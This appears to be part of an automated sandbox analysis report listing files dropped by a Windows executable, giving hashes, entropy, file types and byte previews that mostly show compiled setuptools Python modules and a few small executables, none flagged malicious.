                                                                                                                                            Preview:...........e?Q..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.e.e.j.........f...........Z.e.e.g.e.f...........Z.e.e...........Z.e.j.........j ........Z!e.r.d.d.l"m#Z#..d.e.d.e.f.d...Z$..G.d...d...............Z%..G.d...d.e%..............Z&..G.d...d.e&..............Z'..G.d...d.e%..............Z(..G.d...d.e'..............Z)..G.d...d.e(..............Z*d.e.d.e.d.e.e...........f.d...Z+..G.d...d...............Z,d.e.e...........d.e.e...........f.d...Z-d.e.e...........d.e.e...........f.d ..Z.d.e.e...........d!e.e.e.f...........d"e.d.e.e...........f.d#..Z/d$e.d!e.e.e.f...........d"e.d.e.f.d%..Z0d.e.e...........d&e.d.e.e.e.f...........f.d'..Z1d.S.)(u_...Automatic discovery of Python modules and packages (for inclusion in the.distribution) and other config values...For the purposes of this module, the following nomenclature is used:..- "src-layout": a directory representing a Pyt
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64082
                                                                                                                                            Entropy (8bit):5.438506285409036
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ms9wqSLyaaSB1iQMB0L33vOUNWY/vQis5:qaSB1PY07fL3Qn
                                                                                                                                            MD5:CEE9A936793959AF41AE6A6EBBBE4527
                                                                                                                                            SHA1:B3C7D859B66AD3CD206C78B5D3D7313DAADDD82E
                                                                                                                                            SHA-256:FFE3B5B7EEBAF7D7B9271B2817E9636A3B948BEF10B6C199FCC4982E860DB8D0
                                                                                                                                            SHA-512:A2C7B69E04E938E9F6BCCBE6716F763EA567C92726A930611B660E57EC1FE3E521BE291DA8DC8EFFC949C2D1D18C520D5DE38466AFDF285B1DDAF9601B1AAC30
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................R.....d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..d.d.l.m$Z$..d.d.l%m&Z&..d.d.l%m'Z'..d.d.l(m)Z)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/Z/d.d.l0Z/d.d.l/m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6..d.d.l7m8Z8..d.d.l9Z9d.d.l:m;Z;..d.d.l-m<Z<..d.d.l-m=Z=..e.r.d.d.l>m?Z?....e@d...................e@d.................d...ZAd...ZBd.eCd eCf.d!..ZDd"d#d$eCd e.eC..........f.d%..ZEd"d#d$eCd e.eC..........f.d&..ZFd"d#d$eCd e.e.eC....................f.d'..ZGd"d#d e.eC..........f.d(..ZHd)..ZId*..ZJd+..ZKeLeMf.ZNd,..ZOd-..ZPd...ZQd/..ZRd0..ZSd1..ZTd2..ZUd3..ZVd4..ZWd5..ZXd6..ZYd7..ZZd8..Z[..e3e.j\........j]......................Z^..G.d9..d.e^..............Z]..G.d:..d;e...............Z_d.S.)<..Distribution.....N)...strtobool)...DEBUG....translate_longopt)...iglob)...List..Optional..TYPE_CHECKING)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2976
                                                                                                                                            Entropy (8bit):5.361831503111787
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:lwVml1Z/qdT2R/WoreZ5l2mtgtskt9nrpysnXVj/A0+YPCvhLtt:emlDqN2R/WoreZ5itprYsnR/AWC5Ltt
                                                                                                                                            MD5:3D2046B5C5F471BA31B6A67A314434B4
                                                                                                                                            SHA1:E40D23552E63CF158A5506C3C2172493D1EA8591
                                                                                                                                            SHA-256:4E51C68B1F8BAA38337CF52800E4AD1412A4D080B5DA93F6C9FDB4BF2208776D
                                                                                                                                            SHA-512:CC2632CE0FE66835CFF77FA1771BD85F765CA7FEDE96F00036137C83C2AD470F82F6764F77E33E7A18EE420CE80A88CE926D397C4AF49C21F17A2B5A1F852CAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................@.....d.Z.d.d.l.m.Z...e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z...G.d...d.e.e ..............Z!..G.d...d.e.e ..............Z"d.S.).zCsetuptools.errors..Provides exceptions used by setuptools modules.......)...errorsc...........................e.Z.d.Z.d.Z.d.S.)...RemovedCommandErroraO...Error used for commands that have been removed in setuptools... Since ``setuptools`` is built on ``distutils``, simply removing a command. from ``setuptools`` will make the behavior fall back to ``distutils``; this. error is raised if a command exists in ``distutils`` but has been actively. removed in ``setuptools``.. N....__name__..__module__..__qualname__..__doc__........eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setupto
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6832
                                                                                                                                            Entropy (8bit):5.339207994840267
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:7Gd+5XWC71aLU4gciCBSt93Ud7ZY29U9bKgdj5ne41MeHwLmSZY4A25+SSx8k:C6OGLCBA92NSJ7pQiQA25+SSx8k
                                                                                                                                            MD5:0590470DBE2E65BF49F4BBC3B9CDB751
                                                                                                                                            SHA1:1A0E72BA6871C061C9751D93B540AD61076499AC
                                                                                                                                            SHA-256:EBFCB97F93618B94B004D179C7E4E3E28F30BF25B0F463C075D5671BDC53E159
                                                                                                                                            SHA-512:3FE69349EC8418AD2CB1FF44A710C072ECBD191B844D9A456675AF02E27027B7BE0CF6202D9B7D5E7527E5818322CE8EB78F54C3043C260EF88DA33D3BD0CC29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.e.Z...e.e.j.........j.......................Z...G.d...d.e...............Z...G.d...d.e...............Z.d.S.)......N.....)...get_unpatchedc.....................^.....d.}...t...........|.d.g.................j...........d.S.#.t...........$.r...Y.n.w.x.Y.w.d.S.).z0. Return True if Cython can be imported.. z.Cython.Distutils.build_ext..build_ext)...fromlistTF)...__import__r......Exception)...cython_impls.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\extension.py.._have_cythonr........sP........./.K.........;.+....7..7..7..A..A....t....................................5s..........*...*.c.....................(.......e.Z.d.Z.d.Z...f.d...Z.d...Z...x.Z.S.)...Extensiona..... Describes a single extension module... This means that all source files will be compiled into a single binary file. ``<module path>.<suffix>`` (with ``<module p
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4420
                                                                                                                                            Entropy (8bit):5.284730049601188
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jqx/u16O2mYj0olN+6ujA0TmNEBXGvBdgSXg/6aaP2sXc7/ipRZdSmhdxrfubFdf:j6uEpAQKfBWfgjwO+TPJgmNXm
                                                                                                                                            MD5:2A11E360EBE42C052639389FA9E2708B
                                                                                                                                            SHA1:7548D0AD408EF390E184443CA2904B93CD57D304
                                                                                                                                            SHA-256:D6B8ACA42B6AA846061579C4DE79BBBD2136C7BFFE400D1BD019A622C81529E0
                                                                                                                                            SHA-512:4AA2CC84E04C1B065BE3F7105A450978BDC798A9229C5BA8E2365A404D419C91A7CCDE335D455CBF54F5BF6618C03946837A56D27620A2A8C526AE8CC29617C4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................r.....d.d.l.Z.d.d.l.Z...G.d...d...............Z.d.Z...e.e.e.d.....................................................d.S.)......Nc.....................V.....e.Z.d.Z.d.Z.d.d...Z.e.d.................Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d.S.)...VendorImporterz.. A PEP 302 meta path importer for finding optionally-vendored. or otherwise naturally-installed packages from root_name.. ..Nc.....................v.....|.|._.........t...........|...............|._.........|.p.|.......................d.d...............|._.........d.S.).N..extern.._vendor)...root_name..set..vendored_names..replace..vendor_pkg)...selfr....r....r....s.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\extern\__init__.py..__init__z.VendorImporter.__init__....s9......."......!....1..1.......$..N...(9.(9.(.I.(N.(N.............c................#....*...K.....|.j.........d.z...V.....d.V.....d.S.).zL. Search first the ve
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6589
                                                                                                                                            Entropy (8bit):5.136748253123854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:jyfdtlQ4yZsvYJaQ4yZsEZatJAiwvu3XJ8p2MuUqluZlhsTwF/UblMIl8L:jyQ7ZbaQ7Z0Ai/JXY/awF/KMIyL
                                                                                                                                            MD5:133BD4AB71B5E05FB8BCE473D47A3C80
                                                                                                                                            SHA1:3F1EC31033B225F0111169DE8A824E71D7631510
                                                                                                                                            SHA-256:0866C34EAFF6C65E7D0759943A825908B869AE986697888D637F0CC348FA5AAD
                                                                                                                                            SHA-512:B7B036F1B6BDCF02CEF086866E9448FB36399938971CA49C4B9A6EE619582E58EEC20F123BF8645F99903D5E68515966B8257238196A6495E748117643DCA50D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...e.j.........d...............Z...e.j.........d...............Z.d...Z.d...Z.d...Z.d.S.).z..Filename globbing utility. Mostly a copy of `glob` from Python 3.5...Changes include:. * `yield from` and PEP3102 `*` removed.. * Hidden files are not ignored.......N)...glob..iglob..escapeFc.....................>.....t...........t...........|.|...............................S.).ay...Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '*' and '?'. patterns... If recursive is true, the pattern '**' will match any files and. zero or more directories and subdirectories.. )...recursive)...listr....)...pathnamer....s.... .cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\si
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65536
                                                                                                                                            Entropy (8bit):6.390958988358771
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:nMgEYaPKRsVvd7M826QXqVXDjPXHyRhQcBU+zGqJS967GMctEvdGA9SYxQ:Mg/6/tM8NXDjPX0QWlfGMckTQ
                                                                                                                                            MD5:E97C622B03FB2A2598BF019FBBE29F2C
                                                                                                                                            SHA1:32698BD1D3A0FF6CF441770D1B2B816285068D19
                                                                                                                                            SHA-256:5C1AF46C7300E87A73DACF6CF41CE397E3F05DF6BD9C7E227B4AC59F85769160
                                                                                                                                            SHA-512:DB70C62FB35A8E5B005F13B57C1EBBF6C465F6FF0524422294C43E27FB4AA79379DC1E300AD11DC2354405C43B192AE06B91C0F525A1F2617E4D14673651A87D
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):75264
                                                                                                                                            Entropy (8bit):6.114619708611424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:MpsuhGpr4+qQt4O/6LEmo1dFPo6O28E0PTBmf2iBQsdkRQ5WF:MpsgozqC4O/jHxo6l0PTBuJBQbRQ5WF
                                                                                                                                            MD5:2FFC9A24492C0A1AF4D562F0C7608AA5
                                                                                                                                            SHA1:1FD5FF6136FBA36E9EE22598ECD250AF3180EE53
                                                                                                                                            SHA-256:69828C857D4824B9F850B1E0597D2C134C91114B7A0774C41DFFE33B0EB23721
                                                                                                                                            SHA-512:03806D162931B1DCF036A51E753FF073A43664491A3CD2E649E55DD77D5E910F7BCF1E217EB0889EF606457B679428640E975EE227DE941A200F652417BC6D5D
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (GUI) Aarch64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137728
                                                                                                                                            Entropy (8bit):6.050853967225197
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:fTDQsU/VoMDk9LF+0gbbsTWFN0PBiv3UCqqtqnldS7ur4K+oMXG0nhuasWsMd7M/:fTDVCvDk9LFpxAtqnelK+oDihusoQk
                                                                                                                                            MD5:FCCF856A1C8D866282DB478917AB9976
                                                                                                                                            SHA1:26CBB509EB641143871FD3CF204CDB93FA8189EA
                                                                                                                                            SHA-256:4C416738A0E2FA6AB766CCF1A9B0A80974E733F9615168DD22A069AFA7D5B38D
                                                                                                                                            SHA-512:2BF8FB2D20869162B85F0BE6D671395C4B3AE3F80F57F9A8B11B3A41ECC334B9543CE85317E3F3C02E5411095B9AF2C3B01A9D0D997908CC0A7FE2CF00D4597A
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65536
                                                                                                                                            Entropy (8bit):6.390958988358771
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:nMgEYaPKRsVvd7M826QXqVXDjPXHyRhQcBU+zGqJS967GMctEvdGA9SYxQ:Mg/6/tM8NXDjPX0QWlfGMckTQ
                                                                                                                                            MD5:E97C622B03FB2A2598BF019FBBE29F2C
                                                                                                                                            SHA1:32698BD1D3A0FF6CF441770D1B2B816285068D19
                                                                                                                                            SHA-256:5C1AF46C7300E87A73DACF6CF41CE397E3F05DF6BD9C7E227B4AC59F85769160
                                                                                                                                            SHA-512:DB70C62FB35A8E5B005F13B57C1EBBF6C465F6FF0524422294C43E27FB4AA79379DC1E300AD11DC2354405C43B192AE06B91C0F525A1F2617E4D14673651A87D
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5639
                                                                                                                                            Entropy (8bit):5.3985079348274105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:0OWpWcpGexcLineWUqLQ+ClSUTrhnnkcs:0XpLGgc+neWUqJClSmVnkx
                                                                                                                                            MD5:91B18699F8A84B7B8EA2BB06E5DA5DF9
                                                                                                                                            SHA1:D01A11A14DFB94BF65AC92E6CD6CD284192133A3
                                                                                                                                            SHA-256:C43616C04471F323C8523E4D8C57EFE657065531716043D5C0E2DC106CF3B72B
                                                                                                                                            SHA-512:A927CCB5F5EB0245EB095A7ECBB6BFC90B6ED635EC896DBC1749D0FD5EAE8A3A3E80D82195F4EC11682623FDF9D07E72D9512B6D5EB6E9D22AF9590A7CE48076
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d.S.)......N)...log)...DistutilsError)...Wheel.....)...SetuptoolsDeprecationWarningc..........................t...........|.t.........................r.|.....................................S.t...........|.t...........t...........f...............s.J...|.S.).z8Ensure find-links option end-up being a list of strings.)...isinstance..str..split..tuple..list)...find_linkss.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\installer.py.._fixup_find_linksr........sF.........*.c..".."...."...........!..!..!....j.5.$.-..0..0..0..0..0...........c...........................t...........j.........d.t.............................t...........j.........d.................n5#.t...........j.........$.r#..|.......................d.t...........j.........................Y.n.w.x.Y.w.t...........|.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1555
                                                                                                                                            Entropy (8bit):5.323855627866773
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:O2vxGjz8V6Z5g3/qDvIgb72m0NoYrVTZaKiFc:JvslMqDTbiSYrVTZpoc
                                                                                                                                            MD5:7885288EE0C515BE44184EA0F8882D72
                                                                                                                                            SHA1:05922AB0359CE8F74790DB3A5469E2642580488C
                                                                                                                                            SHA-256:29797B2C8C29ADFD11AAC27DBD71C12DF4B2C279745F6D3A49E0203C872E2EF2
                                                                                                                                            SHA-512:32FB9C2EDD4664796B21D3D87F95123113A04C2F169298CEABEFC1AF9D5A7447CBADE52E8A1EB57CE710CBC1CE6FBC805482F62101A488794A0FC5981BF88AF9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e,.........................D.....d.Z.d.d.l.Z.d.d.l.Z.d...Z.e.d.k.....r...e.................d.S.d.S.).z[.Launch the Python script on the command line after.setuptools is bootstrapped via import.......Nc..........................t.............t...........j.........d...........}.t...........|.d.d.................}.t...........j.........d.d.............t...........j.........d.d...<...t...........t...........d.t.........................}...|.|...............5.}.|.....................................}.d.d.d.................n.#.1.s.w.x.Y.w...Y.....|.......................d.d...............}.t...........|.|.d...............}.t...........|.|.................d.S.).zP. Run the script in sys.argv[1] as if it had. been invoked naturally.. .......__main__N)...__file__..__name__..__doc__..openz.\r\nz.\n..exec)...__builtins__..sys..argv..dict..getattr..tokenizer......read..replace..compiler....)...script_name..namespace..open_..fid..script..norm_script..codes.... .eC:\Users\
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2073
                                                                                                                                            Entropy (8bit):4.903370571721881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:czkmg4E/m2m2mG1Mq2FgXwhH7SMhjq8i1NadKdbH65VVLGQ7tgMPytjnnJDc:Yem2mVG6dtRq8rIH65/17lPqjJY
                                                                                                                                            MD5:21DC6CEAFE5026633F12A63E98D6DBD0
                                                                                                                                            SHA1:32D274891D58D5467527A72D81B6414D401F51A8
                                                                                                                                            SHA-256:41FC7D4C4E8A4DF664E8D16E843D60D67DDEE7376272CE56BF17EDA6CEE405EE
                                                                                                                                            SHA-512:025373C84DF537705B5A714142161F8B0302D63DE40A73107DF319011C8EE7291B9228B76E58F723C4A39B161D0B9D2932B343F949ADE242F10A2E952ABE0E87
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................<.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.d...Z.d.S.)......N.....)...monkeyc.....................,.....|.j.........t...........j.........k.....S.).N)...levelno..logging..WARNING)...records.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\logging.py.._not_warningr........s..........>.G.O..+..+.....c...........................t...........j.......................}.|.......................t...........j.........................t...........j.........t...........j.......................}.|.......................t...........................|.|.f.}.t...........j.........d.d.|.t...........j...........................t...........t...........j.........d...............rBt...........j.........t...........t...........j.........d.................t...........j.........t...........j........._.........d.S.d.S.).z.. Configure logging to emit warning and above to stderr. and everything else to stdout. T
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7032
                                                                                                                                            Entropy (8bit):5.307489704496102
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xQVTY4oexKsqzRSlk4TXMIzewLn/2s7YWnKzGS8GP50DICRqEPQ/aZQJ:xQVk4oecRSlk4TXV7gWKXIqEI/ag
                                                                                                                                            MD5:FBB499EBD72B6A1E6FDAF9C00355FBD0
                                                                                                                                            SHA1:11823D89849E0D3AFBDDDBB435AF06D91A2D6EA3
                                                                                                                                            SHA-256:8388246AEB1C89725701E9CEAF662537548058E5B68D7CCD48BF5980760CC997
                                                                                                                                            SHA-512:9F51B65006FA779035F59395DBB3E4AE7152BCE8DC1D8047813BBCC122119FD7001CF3A22D56AB9CA817FB8B92814DEE27C56316B6F6E0DC2652C6F8EFDF9B11
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.g.Z...d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.).z..Monkey patching of distutils.......N)...import_modulec.....................n.....t...........j.......................d.k.....r.|.f.|.j.........z...S.t...........j.........|...............S.).am.... Returns the bases classes for cls sorted by the MRO... Works around an issue on Jython where inspect.getmro will not return all. base classes if multiple classes share the same name. Instead, this. function will return a tuple containing the class itself, and the contents. of cls.__bases__. See https://github.com/pypa/setuptools/issues/1024.. ..Jython)...platform..python_implementation..__bases__..inspect..getmro)...clss.... .eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\monkey.py.._get_mror........s7............%..'..'.8..3..3....v......%..%....>.#...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64205
                                                                                                                                            Entropy (8bit):5.452728566797058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:YSG5zHMUV96wpQW1fw+Al4JPQSlBW7YHH66wKsy6hBjVIxgdHfvOl9PUSk6dDeSp:4HMUHnxHH21kgdHUUaP
                                                                                                                                            MD5:DA7DE1A8CE48477346DF4EA14C433DED
                                                                                                                                            SHA1:E2B3A86E8A1E696E7BD63CEAA5DBE284F9954828
                                                                                                                                            SHA-256:7A9D7C03CFA7A1893BDADF67B685CFF0477893324D1BC2939D1CC3977BF90385
                                                                                                                                            SHA-512:4955E1425CACE23021907091D2E44188CFEC9D39004464E08B0D77B48948E073452A4CE151B80D933A3A58B0E9CE940DAA5DFFB4367E4957E779A52A35E858E8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........el..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.......................d.k.....r.d.d.l.Z.d.d.l.m.Z...n...G.d...d...............Z...e...............Z.d...Z.d...Z.d.d.d.d.d...Z.d...Z d...Z!d...Z"d...Z#d#d...Z$..G.d...d...............Z%..G.d...d...............Z&..G.d...d ..............Z'..G.d!..d"..............Z(d.S.)$a.....Improved support for Microsoft Visual C++ compilers...Known supported compilers:.--------------------------.Microsoft Visual C++ 14.X:. Microsoft Visual C++ Build Tools 2015 (x86, x64, arm). Microsoft Visual Studio Build Tools 2017 (x86, x64, arm, arm64). Microsoft Visual Studio Build Tools 2019 (x86, x64, arm, arm64)..This may also support compilers shipped with compatible Visual Studio versions.......N)...open)...listdir..pathsep)...join..isfile..isdir..dirname)...LegacyVersion)...unique_everseen.....)...get_unp
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5687
                                                                                                                                            Entropy (8bit):5.225568242708696
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b+iObeBEZtPf7cEbYDKg7SgOTO5AHhOloXNWZWhm2RyBQhhjrlU0LxT:yj97c9Kg2gOTOiwadWZ1ZBQhBlzxT
                                                                                                                                            MD5:3DC27E0EB150CD13E06DEEA29E504007
                                                                                                                                            SHA1:FE16FDB611B719025755B292ABC95CB8B1A4D3FB
                                                                                                                                            SHA-256:427046D2219B28D9A3677C4F464F7DF174058C77C9FB6E311FE1AF0BDDE1F1E7
                                                                                                                                            SHA-512:1230A632B6FC89D8346E4234E3309754D60474EFA8B6722589BB639AF4572EC906F0F7BF53E594ED4894ED47E19E0AEF967B520754DB44452C9C75A5A9C72371
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................p.....d.d.l.Z.d.d.l.m.Z...d.d.l.Z.e.j.........j.........Z...G.d...d...............Z...G.d...d.e...............Z.d.S.)......N)...logc.....................X.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.Z...d.Z...d...Z.d...Z.d...Z.e.d.................Z.d.S.)...Installerz.-nspkg.pthc...........................|.....................................}.|.s.d.S.t...........j...............................|...................................................\...}.}.|.|.j.........z...}.|.j...............................|.................t...........j.........d.|.................t...........|.j.........|...............}.|.j.........r.t...........|.................d.S.t...........|.d...............5.}.|.......................|.................d.d.d.................d.S.#.1.s.w.x.Y.w...Y.....d.S.).Nz.Installing %s..wt)..._get_all_ns_packages..os..path..splitext.._get_target..nspkg_ext..outputs..appendr......info..map.._gen_nspkg_line..dry_run..list..open..writelines)...sel
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60782
                                                                                                                                            Entropy (8bit):5.296108418233854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:t6bnZDTPLyL3ar5c8/Lj5zZPuIPUbowrQLayYQcekHid6kDqjO5KoRdWOv9wKZ:OTNzPumUMWKkjtvGXRkOv2KZ
                                                                                                                                            MD5:8F51FCD23A44AF25EB625AA1A546BB81
                                                                                                                                            SHA1:27993AE04A6D541BCD2A1029156EDBD512A42AF0
                                                                                                                                            SHA-256:7F08B64D5322F2CEE582C5F9A03D60E07FBA79EDD029D05C2B4CFC156A76D560
                                                                                                                                            SHA-512:0BE3D801742ECCE5B28948C93772C922EBBD7619A2BC2E9572DD6AFC523E3D8CD242D92A501281D759052611D2F8D5BCB29A8582B6586F6D533F5F3C053BA7B8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eT...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z.....e.j/........d...............Z0..e.j/........d.e.j1......................Z2..e.j/........d...............Z3..e.j/........d.e.j1......................j4........Z5d..6..................................Z7g.d...Z8d.Z9d.Z:e:.;......................d.j;........e.j<..........e.................Z=d...Z>d...Z?d...Z@d1d...ZAd1d...ZBd1d...ZCd.e.d.f.d...ZDd...ZE..e.j/........d.e.j1......................ZFeEd.................ZG..G.d...d...............ZH..G.d ..d!eH..............ZI..G.d"..d#e...............ZJ..e.j/........d$..............jK........ZLd%..ZMd&..ZNd2d'..ZOd(..ZP..G.d)..d*..............ZQ..G.d+..d,e.jR......................ZSe.jT........jU........f.d-..ZVd...ZW....eOe9....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):742
                                                                                                                                            Entropy (8bit):5.2466983752993
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:B2wQv/yUtC6tk9K4I1R/2IpRVRdyDoJnPGnwPjsKtZ7jOt4vR5xxxxxfm/n:IwQ6Uc6WX452m1y2PGnw/tZ3Otyjm/n
                                                                                                                                            MD5:0F8108E574032A0D57E82586A2B845C9
                                                                                                                                            SHA1:13D16882F6216A626D241EED6DB356E8C02D7A1A
                                                                                                                                            SHA-256:2CF3736F484FAC415E943611D47E2DB296DBA7865EBBEF0683D4E9635C9B5308
                                                                                                                                            SHA-512:A6CA4B3DE88C385FF6DDEE52D041FBF81300D1F8750DCD91338C320320F2CF392DB081468416C71CD95EDF3CFD4D357FF576DCDB484B8913259E41310C869A76
                                                                                                                                            Malicious:false
